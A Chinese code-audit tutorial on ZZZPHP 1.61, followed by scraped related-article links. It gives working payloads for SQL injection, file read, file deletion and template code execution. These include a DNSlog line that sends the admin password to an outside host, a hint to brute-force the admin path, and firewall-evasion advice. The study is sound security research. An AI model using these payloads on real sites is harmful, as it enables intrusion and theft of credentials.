近期有很多小伙伴在后台留言想看关于代码审计的文章,其实有关审计的文章网上资源是比较多的,但是从代码审计开始到结束的这类文章却少之甚少。

今天要讲解的ZZZPHP1.61这套审计漏洞比较多,SQL注入漏洞、任意文件删除漏洞、任意文件读取漏洞、远程执行漏洞,当中也借助了漏扫工具,内容涵盖全面,分析透彻,学完定会受益匪浅!

注:文章还是原来的方式,先复现后分析,阅读用时约7分钟。

SQL注入漏洞(获取管理员密码)

漏洞复现

payload:

GET /search/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=58ebb86ae371bd1f65466b1b94f7a5f7; zzz_adminpass=1;zzz_keys=0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

对比两次的时间就晓得我们的语句执行成功了,表示存在SQL注入漏洞。

漏洞分析

这个洞是先用AWVS工具扫了一遍出来的,我们审计一套代码的时候可以先试试这些漏扫工具,提高一下效率。虽然有误报但是收集到的信息比手工去检测的效率高。

大家测试的时候可以用PHPstorm或者vscode这些工具去调试,走一遍整个过程,这样会对程序有所了解。

再发一次包到search页面会停留到search/index.php文件,这个文件比较简单,包含了一个zzz_client.php的文件。

<?php
define('LOCATION', 'search');
require dirname(dirname(__FILE__)). '/inc/zzz_client.php';

进到inc/zzz_client.php文件有一些包含的进来的文件类似模板的文件等,这里通过上面的LOCATION找到$tplfile= TPL_DIR . 'search.html';

switch ($location) {
case 'about':
$tplfile= TPL_DIR . G('stpl');
break;
case 'brand':
$stpl=splits(db_select('brand','b_template',"bid=".G('bid') or "b_name='".G('bname')."'"),',');
if (defined('ISWAP')){
$tplfile=isset($stpl[1]) ? $stpl[1] : $stpl[0];
}else{
$tplfile=$stpl[0];
}
$tplfile=empty($tplfile) ? TPL_DIR .'brand.html' : TPL_DIR . $tplfile ;
break;
case 'brandlist':
$tplfile=isset($stpl) ? TPL_DIR . $stpl: TPL_DIR . 'brandlist.html';
$GLOBALS['tid']='-1';
break;
case 'content':
$tplfile= TPL_DIR . G('ctpl');
break;
case 'list':
$tplfile= TPL_DIR . G('stpl');
break;
case 'taglist':
$tplfile=TPL_DIR . 'taglist.html';
$GLOBALS['tid']='-1';
break;
case 'user':
$tplfile= TPL_DIR . 'user.html';
break;
case 'search':
$tplfile= TPL_DIR . 'search.html';
break;

到下面就实例化,解析模板。

}elseif($conf['runmode']==0|| $conf['runmode']==2 || $location=='search' ||$location=='form' ||$location=='screen' || $location=='app'){
$zcontent = load_file($tplfile,$location);
$parser = new ParserTemplate();
$zcontent = $parser->parserCommom($zcontent); // 解析模板
echo $zcontent;

往下走进到inc/zzz_template.php文件,注入的主要是$zcontent =

$this->parserlocation( $zcontent ); // 站点标签这一句,继续parserSearch函数跟下去。

case 'search':
$zcontent = $this->parserSearch( $zcontent );

走到inc/zzz_template.php的1561行,如果经过getform函数的话会被txt_html过滤掉,但是我们用的cookie,所以这里直接获取没有过滤。

$keys = safe_key(getform( 'keys', 'post' ),60);
if ( $keys ) {
set_cookie( 'keys', $keys );
} else {
$keys = get_cookie( 'keys' );
}

我们可以进get_cookie函数看下,prefix前缀是zzz_所以我们的参数为zzz_keys,这里获取到了数据但也没有过滤直接就返回了。

function get_cookie( $name ) {
if ( is_null( $name ) ) return '';
$data = isset( $_COOKIE[ $_SERVER[ 'prefix' ] . $name ] ) ? $_COOKIE[ $_SERVER[ 'prefix' ] . $name ] : NULL;
return $data;
}

下面就是直接执行了我们带有恶意的SQL语句了

知道有SQL注入漏洞后,可以直接扔进SQLmap或者用DNSlog,下面我提供一个DNSlog的payload:

0'XOR(if(now()=sysdate(),(select load_file(concat('\\\\',(select password from zzz_user where username='admin'),'.xxxx.ceye.io\\abc'))),0))XOR'Z

任意文件读取漏洞(获取敏感信息)

漏洞复现

payload:

GET /admin155/?module=templateedit&type=/config/zzz_config.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin155/?datebackuplist
Cookie: PHPSESSID=58ebb86ae371bd1f65466b1b94f7a5f7; zzz_adminpass=1; zzz_adminpath=0; zzz_adminface=..%2Fplugins%2Fface%2Fface1.png; zzz_adminname=admin; XDEBUG_SESSION=PHPSTORM
Connection: close
Upgrade-Insecure-Requests: 1

这个漏洞是无需登录后台的,后台的地址可以直接写一个Python脚本来爆破一下就行了,命名规则为admin+三位随机数。

漏洞分析

这个漏洞是在后台查看模板文件内容的时候找到的,抓一个包然后改变下路径看是否能读到其他的目录文件。

文件路径admin155/index.php

前面是获取module和type参数,看到文件的最后面包含文件这里,走进去看下:

$GLOBALS['r']=isset($data) ? arr_key($data) : '';
//echop (parse_admin_tlp($module));die;
include parse_admin_tlp($module);

作用是把我们刚才传入的模板名称然后生成一个缓存文件。

function parse_admin_tlp( $module ) {
$tpltype = G( 'ID' ) ? 'edit' : 'add';
$tplfile = SITE_DIR . conf( 'adminpath' ) . 'template/' . $module . '.tpl';
$cachefile = RUN_DIR . 'cache/' . conf( 'adminpath' ) . md5( $module . $tpltype ) . '.tpl';
//echop ($tplfile);echop ($cachefile);
//echop( template_parse(load_file($tplfile)));
if ( !is_file( $cachefile ) || time_file( $tplfile ) > time_file( $cachefile ) || size_file( $tplfile ) == 0 ) {
create_file( $cachefile, template_parse( load_file( $tplfile ) ) );
}
return $cachefile;
}

后面会走到缓存文件的26行,load_file加载文件,网站的根目录和刚才传入的type也就是我们的路径。

<?php echo load_file($_SERVER['DOCUMENT_ROOT'].G('type'));?>

inc/zzz_file.php的load_file函数,这里做了一个替换,不过没什么卵用,判断是否是文件就直接读取内容了。

function load_file( $path, $location = NULL ) {
$path = str_replace( '//', '/', $path );
if ( is_file( $path ) ) {
return file_get_contents( $path );
} elseif ( !is_null( $location ) ) {
$locationpath = PLUG_DIR . 'template/' . $location . '.tpl';
if ( is_file( $locationpath ) ) {
return file_get_contents( $locationpath );
} else {
$url = $_SERVER[ 'REQUEST_URI' ];
$url = sub_left( $url, '?' );
phpgo( $url );
return false;
}
} elseif ( is_file( SITE_DIR . $path ) ) {
return file_get_contents( SITE_DIR . $path );
} else {
error( "载入文件失败,请检查文件路径!," . str_replace( DOC_PATH, '', $path ) );
return false;
}
}

读取网站之外的文件

为什么没有登录后台也能利用这个漏洞呢?

先在admin155/index.php里面包含inc/zzz_admin.php文件,但是这个inc/zzz_admin.php文件判断后没有用exit( )这类的函数,导致程序继续往下走,又会回到admin155/index.php执行67行的内容,导致出现了可以不用登录后台也能读取任意文件。

任意文件删除漏洞

漏洞复现

Payload:

POST /admin155/save.php?act=delfile HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin155/?module=uploadlist&type=&folder=product
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Cookie: PHPSESSID=58ebb86ae371bd1f65466b1b94f7a5f7; zzz_adminpass=1; zzz_adminpath=0; zzz_adminface=..%2Fplugins%2Fface%2Fface1.png; zzz_adminname=admin; XDEBUG_SESSION=PHPSTORM
Connection: close
path=/upload/..//install/install.lock

漏洞分析

这个漏洞也是在后台做一些删除操作的时候发现的,开始的时候限制了目录,程序里面做了安全目录的限制,但是还是可以通过一些手段去绕过的。

根据我们的paylaod可以看到admin155/save.php的文件,delfile( )函数,这里从post方式获取到路径,这里做了一个限制的数组$safe_path,通过arr_search函数来寻找是否匹配。如果存在的话就传递给del_file函数。

function delfile(){
$file=getform('path','post');
$file_path=file_path($file);
$safe_path=array('upload','template','runtime','backup');
if(arr_search($file_path,$safe_path)){
$file=$_SERVER['DOCUMENT_ROOT'].$file;
return del_file($file);
}
}

比较数组

// 比较两个数组,是否有重复,重复则返回true
function arr_search($arr1, $arr2 ) {
$result=false;
foreach ( $arr1 as $v ) {
if(in_array( $v,$arr2 )) return true;
}
return $result;
}

但是这里做了后缀的限制,后缀一定不能是'php', 'db', 'mdb', 'tpl'类型。

function del_file( $file ) {
if ( is_null( $file ) ) return FALSE;
$file = is_file( $file ) ? $file : $_SERVER[ 'DOCUMENT_ROOT' ] . $file;
if ( is_file( $file ) ) {
if (ifstrin( $file,'runtime')){
unlink( $file );
}else{
$ext = file_ext( $file );
if ( in_array( $ext, array( 'php', 'db', 'mdb', 'tpl' ) ) ) return FALSE;
if ( !unlink( $file ) ) {
$r = @rename( $file, randname() );
}
}
}
}

但是我们能删除install.lock之类的文件,删除这个安装文件就可以重新安装程序,然后远程写入配置文件的方法把我们的恶意语句写进配置文件中去。

参考文章:

https://getpass.cn/MIPCMS%20V3.1.0%20Remotely%20Writing%20the%20Configuration%20File%20Getshell/ ,但是这个程序不行,他的大部分get、post都是经过getform函数的,这个函数里面用了一个txt_html转换来过滤掉我们的字符。

function getform( $name, $source = 'both', $type = NULL, $default = NULL ) {
switch ( $source ) {
case 'post':
$data = _POST( $name );
break;
case 'get':
$data = _GET( $name );
break;
case 'both':
$data = _POST( $name ) ? : _GET( $name );
break;
}
if ( !is_null( $type ) ) {
if(ifch($default)){
$err = checkstr( $data, $type, $default );
}else{
$err = checkstr( $data, $type, $name );
}
if ( $err[ 'code' ] == 0 ){
if ( $default == 'layer' ) {
layererr( $err[ 'err' ] );
} else {
back( $err[ 'err' ] );
}
}
}
if ( !is_null( $default ) && !ifch( $default) ) {
$data = empty( $data ) ? $default : $data;
}
return txt_html( $data );
}

txt_html虽然说这个能作为防御,但是也影响了程序模板部分的功能,等会getshell的时候会分析到。

// txt 转换到 html
function txt_html( $s ) {
if ( !$s ) return $s;
if ( is_array( $s ) ) { // 数组处理
foreach ( $s as $key => $value ) {
$string[ $key ] = txt_html( $value );
}
} else {
if (get_magic_quotes_gpc()) $s = addslashes( $s );
$s = trim( $s );
//array("'"=>"'",'"'=>""",'<'=> "<",'>'=> ">");
if ( DB_TYPE == 'access' ) {
$s= toutf( $s );
$s = str_replace( "'", "'", $s );
$s = str_replace( '"', """, $s );
$s = str_replace( "<", "<", $s );
$s = str_replace( ">", ">", $s );
}else{
$s = htmlspecialchars( $s,ENT_QUOTES,'UTF-8' );
}
$s = str_replace( "\t", ' ', $s );
$s = preg_replace('/script/i', 'scr1pt', $s );
$s = preg_replace('/\.php/i', '.php', $s );
$s = preg_replace('/ascii/i', 'asc11', $s );
$s = preg_replace('/eva1/i' , 'eva1', $s );
$s = str_replace( "┠", "", $s );
$s = str_replace( "┼", "", $s );
$s = str_replace( "\r\n", "\n", $s );
$s = str_replace( "\n", '<br/>', $s );
}
return $s;
}

任意代码执行漏洞(Getshell)

漏洞复现

这个漏洞有点类似于seacms的那个前台getshell,但是这个是要在后台修改模板文件才可执行。

1、登录后台,找到模板管理,电脑模板。

2、随便找一个文件,比如我用brandlist.html,点击编辑,加入我们的payload。

{if:a-ssert($_POST[x])}xxx{end if} //这里为了防止创宇云盾检测到去掉a后面的-就行了。

3、保存后打开我们编辑的页面,post的内容x=phpinfo( );或者x=s-ystem('whoami')//这里也是把s后面的-去掉就行了。

漏洞分析

首先我们可以用seay的代码审计工具去搜索关键字执行,这个我先用了phpstorm的搜索功能找到一个eva1的执行函数,然后逆过来看下从哪里可以执行这个函数,看到了在模板文件的替换函数里面。

我们直接定位到if替换的地方inc/zzz_template.php文件的parserCommom函数,可以进parserIfLabel函数一看究竟。

public
function parserCommom( $zcontent ) {
$zcontent = $this->parserSiteLabel( $zcontent ); // 站点标签
$zcontent = $this->ParseInTemplate( $zcontent ); // 模板标签
$zcontent = $this->parserConfigLabel( $zcontent ); //配置表情
$zcontent = $this->parserSiteLabel( $zcontent ); // 站点标签
$zcontent = $this->parserCompanyLabel( $zcontent ); // 公司标签
$zcontent = $this->parserlocation( $zcontent ); // 站点标签
$zcontent = $this->parserLoopLabel( $zcontent ); // 循环标签
$zcontent = $this->parserContentLoop( $zcontent ); // 指定内容
$zcontent = $this->parserbrandloop( $zcontent );
$zcontent = $this->parserGbookList( $zcontent );
$zcontent = $this->parserUser( $zcontent ); //会员信息
$zcontent = $this->parserLabel( $zcontent ); // 指定内容
$zcontent = $this->parserPicsLoop( $zcontent ); // 内容多图
$zcontent = $this->parserad( $zcontent );
$zcontent = parserPlugLoop( $zcontent );
$zcontent = $this->parserOtherLabel( $zcontent );
$zcontent = $this->parserIfLabel( $zcontent ); // IF语句
$zcontent = $this->parserNoLabel( $zcontent );
return $zcontent;
}

注意:先执行inc/zzz_client.php里面的模板解析函数,然后再进入我们刚才开始分析的地方。

parserIfLabel这个函数开始正则匹配,然后把匹配到的语句做替换,最后ifstr的值为a-ssert($_POST[x]加入eva1的$ifstr函数执行,程序本身没有在这里做过滤一些危险的函数,导致任意代码执行。

public
function parserIfLabel( $zcontent ) {
$pattern = '/\{if:([\s\S]+?)}([\s\S]*?){end\s+if}/';
if ( preg_match_all( $pattern, $zcontent, $matches ) ) {
$count = count( $matches[ 0 ] );
for ( $i = 0; $i < $count; $i++ ) {
$flag = '';
$out_html = '';
$ifstr = $matches[ 1 ][ $i ];
$ifstr = str_replace( '<>', '!=', $ifstr );
$ifstr = str_replace( 'mod', '%', $ifstr );
$ifstr1 = cleft( $ifstr, 0, 1 );
switch ( $ifstr1 ) {
case '=':
$ifstr = '0' . $ifstr;
break;
case '{':
case '[':
$ifstr = "'" . str_replace( "=", "'=", $ifstr );
break;
}
$ifstr = str_replace( '=', '==', $ifstr );
$ifstr = str_replace( '===', '==', $ifstr );
@eva1( 'if(' . $ifstr . '){$flag="if";}else{$flag="else";}' );

上面任意文件删除漏洞说到的影响了模板文件的功能,原因是在txt_html函数里面,因为开始编辑保存的时候它会把整个模板文件的内容传到上面的getform的函数,然后返回数据的时候用了下面的txt_html函数,一般模板文件里面会有一些类似script的字符但是这里过滤了

$s = preg_replace('/script/i', 'scr1pt', $s );所以导致影响了这个编辑模板的功能,这样就很矛盾了。

// txt 转换到 html
function txt_html( $s ) {
if ( !$s ) return $s;
if ( is_array( $s ) ) { // 数组处理
foreach ( $s as $key => $value ) {
$string[ $key ] = txt_html( $value );
}
} else {
if (get_magic_quotes_gpc()) $s = addslashes( $s );
$s = trim( $s );
//array("'"=>"'",'"'=>""",'<'=> "<",'>'=> ">");
if ( DB_TYPE == 'access' ) {
$s= toutf( $s );
$s = str_replace( "'", "'", $s );
$s = str_replace( '"', """, $s );
$s = str_replace( "<", "<", $s );
$s = str_replace( ">", ">", $s );
}else{
$s = htmlspecialchars( $s,ENT_QUOTES,'UTF-8' );
}
$s = str_replace( "\t", ' ', $s );
$s = preg_replace('/script/i', 'scr1pt', $s );
$s = preg_replace('/\.php/i', '.php', $s );
$s = preg_replace('/ascii/i', 'asc11', $s );
$s = preg_replace('/eva1/i' , 'eva1', $s );
$s = str_replace( "┠", "", $s );
$s = str_replace( "┼", "", $s );
$s = str_replace( "\r\n", "\n", $s );
$s = str_replace( "\n", '<br/>', $s );
}
return $s;
}

以上是今天的全部内容,大家学会了吗?

ZZZPHP1.61 代码审计-从SQL注入到Getshell的更多相关文章

  1. 代码审计之SQL注入:BlueCMSv1.6 sp1

    Preface 这是一篇纪录关于BlueCMSv1.6 sp1两个SQL注入的审计过程,原文来自代码审计之SQL注入:BlueCMSv1.6 sp1 ,主要纪录一下个人在参考博文复现这两个漏洞经过. ...

  2. [漏洞案例]thinkcmf 2.x从sql注入到getshell实战

    0X00 前言 这个案例是某项目的漏洞,涉及敏感的地方将会打码. 很久没更新博客了,放一篇上来除除草,新的一年会有所转变,以后会有更多领域的研究. 下面是正文 0X01 正文 某厂商某个网站用的是th ...

  3. [代码审计]某租车系统JAVA代码审计[前台sql注入]

    0x00 前言 艰难徘徊这么久,终于迈出第一步,畏畏缩缩是阻碍大多数人前进的绊脚石,共勉. 系统是租车系统,这个系统是Adog师傅之前发在freebuf(http://www.freebuf.com/ ...

  4. PHP代码审计 -1.SQL注入总结

    0x01 背景          最近在学习PHP代码审计,这里做一个SQL注入总结,是对自己学习知识的总结,也是为自己学习的笔记,方便自己反复翻阅. 0x02 PHP代码审计-SQL注入 挖掘SQL ...

  5. 然之协同系统6.4.1 SQL注入导致getshell

     前言 先知上一个大佬挖的洞,也有了简单的分析 https://xianzhi.aliyun.com/forum/topic/2135 我自己复现分析过程,漏洞的原理比较简单,但是漏洞的利用方式对我而 ...

  6. 代码审计之SQL注入

    0x00概况说明 0x01报错注入及利用 环境说明 kali LAMP 0x0a 核心代码 现在注入的主要原因是程序员在写sql语句的时候还是通过最原始的语句拼接来完成,另外SQL语句有Select. ...

  7. PHP代码审计笔记--SQL注入

    0X01 普通注入 SQL参数拼接,未做任何过滤 <?php $con = mysql_connect("localhost","root"," ...

  8. 代码审计之SQL注入及修复

    在新手入门web安全的时候,sql注入往往是最先上手的一个漏洞,它也是危害相当大的一个漏洞,存在此漏洞的话,将有被脱裤的风险. 以下所有代码都是我自己写的,可能有不美观,代码错误等等问题,希望大家可以 ...

  9. [代码审计]云优cms V 1.1.2前台多处sql注入,任意文件删除修复绕过至getshell

    0X00 总体简介 云优CMS于2017年9月上线全新版本,二级域名分站,内容分站独立,七牛云存储,自定义字段,自定义表单,自定义栏目权限,自定义管理权限等众多功能深受用户青睐,上线短短3个月,下载次 ...

随机推荐

  1. jq跑马灯效果

    这几天公司产品有个无缝循环滚动的广告跑马灯要做,最开始想到的是<marquee>标签,但在PC端正常,在安卓广告屏上却怎么都跑不动,后来用的css3的animation,结果也是PC端及其 ...

  2. .Net Core MVC 网站开发(Ninesky) 2.3、项目架构调整(续)-使用配置文件动态注入

    上次实现了依赖注入,但是web项目必须要引用业务逻辑层和数据存储层的实现,项目解耦并不完全:另一方面,要同时注入业务逻辑层和数据访问层,注入的服务直接写在Startup中显得非常臃肿.理想的方式是,w ...

  3. vs.net git版本仓库使用 之解决冲突方法 原创

    vs.net git 之解决冲突方法 如果别人已经修改推送到服务器,但自已本地未进行同部更新,那么就会出现要解决冲突的提示! 具体解决方法为: ... ... 下载word离线版:vs.net_git ...

  4. 封装第三方jquery插件

    需要自己编写 directives 的情况通常是当你使用了第三方的 jQuery 插件.因为插件在 AngularJS 之外对表单值进行更改,并不能即时反应到 Model 中.例如我们用得比较多的 j ...

  5. Scala 深入浅出实战经典 第51讲:Scala中链式调用风格的实现代码实战及其在Spark中应用

    王家林亲授<DT大数据梦工厂>大数据实战视频 Scala 深入浅出实战经典(1-64讲)完整视频.PPT.代码下载:百度云盘:http://pan.baidu.com/s/1c0noOt6 ...

  6. vsftp不同帐号的目录和权限

    搭建FTP服务器,供虚拟用户使用,实现不同用户具有不同家目录和权限. 1.用户peter的家目录为/var/ftp/vuserdir/peter,他只有下载权限,没有其他权限(创建目录.重命名.删除. ...

  7. android141 360 安装软件管理java代码

    AppManagerActivity package com.itheima52.mobilesafe.activity; import android.app.Activity; import an ...

  8. LED音乐频谱之输出数据处理

    转载请注明出处:http://blog.csdn.net/ruoyunliufeng/article/details/38023539 一.PWM调节 1.初始化 void DACInit() { C ...

  9. C#中var关键字【转】

    [转]http://blog.csdn.net/courageously/article/details/5695626 var关键字是C# 3.0开始新增的特性,称为推断类型 . 可以赋予局部变量推 ...

  10. [kuangbin带你飞]专题四 最短路练习 POJ 1797 Heavy Transportation

    求每条道路的最大承载量 和上一道题差不多 就是松弛的规则从最大值变成了最小值 /* *********************************************** Author :Su ...